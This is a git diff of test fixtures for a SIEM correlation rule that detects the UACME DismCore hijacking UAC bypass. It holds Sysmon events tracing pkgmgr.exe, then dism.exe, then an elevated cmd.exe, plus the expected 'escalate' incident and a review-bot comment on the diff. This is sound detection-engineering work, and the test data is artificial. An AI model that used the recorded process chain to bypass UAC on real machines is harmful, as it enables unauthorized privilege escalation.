.../UACME_23_DismCore_Hijacking/tests/test_2.sc | 6 ------ .../UACME_23_DismCore_Hijacking/tests/test_3.sc | 4 ---- .../UACME_23_DismCore_Hijacking/tests/test_4.sc | 4 ---- .../UACME_23_DismCore_Hijacking/tests/test_5.sc | 4 ---- .../UACME_23_DismCore_Hijacking/tests/test_6.sc | 4 ---- .../UACME_23_DismCore_Hijacking/tests/test_7.sc | 4 ---- 7 files changed, 4 insertions(+), 29 deletions(-) delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_2.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_3.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_4.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_5.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_6.sc 
delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_7.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_1.sc index 9bb9e284..bd6fcc49 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_1.sc 
@@ -1,4 +1,5 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart 
/apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": 
"\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", 
"object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart 
/apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": 
"\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T04:51:37.380Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "3ffc7872-284a-4a9f-8924-9728c9593f41"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", 
"object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T04:51:37.380Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "bcd20b7c-a108-430b-80de-241cbf0bed6b"} -expect 1 {"correlation_name": "UACME_23_DismCore_Hijacking"} +expect 1 {"action": "escalate", "category.generic": "Attack", 
"category.high": "Privilege Escalation", "category.low": "Bypass User Account Control", "correlation_name": "UACME_23_DismCore_Hijacking", "correlation_type": "incident", "datafield1": "cmd.exe ← dism.exe ← pkgmgr.exe", "datafield2": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "event_src.category": "Other", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "UACME_23_DismCore_Hijacking|msedgewin10|\"C:\\Windows\\system32\\cmd.exe\"", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", 
"object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059"} + \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_2.sc deleted file mode 100644 index e5f91d77..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_2.sc +++ /dev/null 
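Review bot: The hunk ends with an added empty fifth line marked `\ No newline at end of file`, so the file now terminates in a blank line without a newline; drop that trailing `+` line and end the `expect` line with a newline instead. The two re-added events appear to match the two removed ones in every field except `recv_time` and `uuid` (`3ffc7872-…` and `bcd20b7c-…` in place of `c4267ff3-…` and `7f409354-…`), so the substantive change is only the expanded `expect` record; keeping the original event lines would have limited the diff to that one line and made it clear that the fixture data did not change. With test_2 through test_7 deleted in this commit, this file is the rule's only coverage, and it exercises just the positive chain pkgmgr.exe → dism.exe → cmd.exe; a companion test with the same dism.exe launch under a different parent and `expect 0` would document what the rule must not fire on.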
@@ -1,6 +0,0 @@
-{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart 
